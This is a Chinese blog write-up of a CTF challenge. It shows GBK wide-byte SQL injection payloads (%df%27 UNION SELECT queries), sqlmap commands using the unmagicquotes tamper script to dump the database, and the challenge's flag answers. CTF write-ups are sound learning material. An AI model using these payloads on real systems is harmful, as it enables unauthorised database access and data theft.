南邮nctf-sql injection 3(宽字节注入) 手注+sqlmap

最新推荐文章于 2021-01-20 02:04:17 发布

烟敛寒林o

最新推荐文章于 2021-01-20 02:04:17 发布

阅读量1.6k

点赞数 2

分类专栏： # ——【 SQL Inject】 ★ CTF

本文链接：https://blog.csdn.net/dyw_666666/article/details/88676863

版权

★ CTF 同时被 2 个专栏收录

54 篇文章 5 订阅

订阅专栏

——【 SQL Inject】

25 篇文章 0 订阅

订阅专栏

题目地址：http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1

进入题目后先简单尝试一下。

很明显的宽字节注入。

宽字节注入就是用一个大于128的十六进制数来吃掉转义符\，gbk编码，字节作为一个字符的编码

关于宽字节注入漏洞具体说明度娘一搜就出来了，这里不再赘述。

手工注入

1、判断列数：

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 order by 1%23

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 order by 2%23

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 order by 3%23

order by 3 时报错，说明只有两列。

2、各类信息：

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2 
union select 2,(concat_ws(char(32,58,32),user(),database(),version()))%23

sae-chinalover@123.125.23.212 : sae-chinalover : 5.5.52-0ubuntu0.14.04.1

3、库名：

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2 union select 2,database()%23

sae-chinalover

4、表名：

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2 
union select 2,group_concat(table_name) 
from information_schema.tables 
where table_schema=database()%23

ctf,ctf2,ctf3,ctf4,news

5、ctf4表的列名：

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2 
union select 2,group_concat(column_name) 
from information_schema.columns 
where table_name=0x63746634%23

id,flag

这里注意：要将表名ctf4转为16进制

这里提供一个字符串转16进制的网站：

http://www.5ixuexiwang.com/str/hex.php

转了16进制之后记得在前面加上0x

6、flag列的数据：

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 and 1=2 
union select 2,(select flag from ctf4)%23

flag{this_is_sqli_flag}

关于flag的答案

这道题提交的答案各不相同。除了刚刚在ctf4中的flag，在ctf2中还有个nctf的flag。

http://chinalover.sinaapp.com/SQL-GBK/index.php?id=%df%27 
union select 1,group_concat(id,content) from ctf2%23

nctf{query_in_mysql}

还有一个答案是我在度娘搜到别人提交的，在ctf4，不过我在ctf4已经找不到这个答案了。

nctf{gbk_3sqli}

sqlmap跑法

1、查看有哪些库：

sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3" --tamper unmagicquotes --dbs

这个时侯就要用到一个脚本了：

脚本名：unmagicquotes.py

作用：宽字符绕过

2、表名：

sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3" --tamper unmagicquotes -D `sae-chinalover` --tables

3、列名：

sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3" --tamper unmagicquotes -D `sae-chinalover` -T ctf4 --columns

4、flag列的数据：

sqlmap.py -u "http://chinalover.sinaapp.com/SQL-GBK/index.php?id=3" --tamper unmagicquotes -D `sae-chinalover` -T ctf4 -C flag

flag{this_is_sqli_flag}

这就是本题宽字节注入的两种解法。

烟敛寒林o

关注

2
点赞
踩
4

收藏

觉得还不错? 一键收藏
打赏
0
评论
南邮nctf-sql injection 3(宽字节注入) 手注+sqlmap

题目地址：http://chinalover.sinaapp.com/SQL-GBK/index.php?id=1进入题目后先简单尝试一下。很明显的宽字节注入。宽字节注入就是用一个大于128的十六进制数来吃掉转义符\，gbk编码，字节作为一个字符的编码关于宽字节注入漏洞具体说明度娘一搜就出来了，这里不再赘述。手工注入1、判断列数：http://chin...
复制链接

扫一扫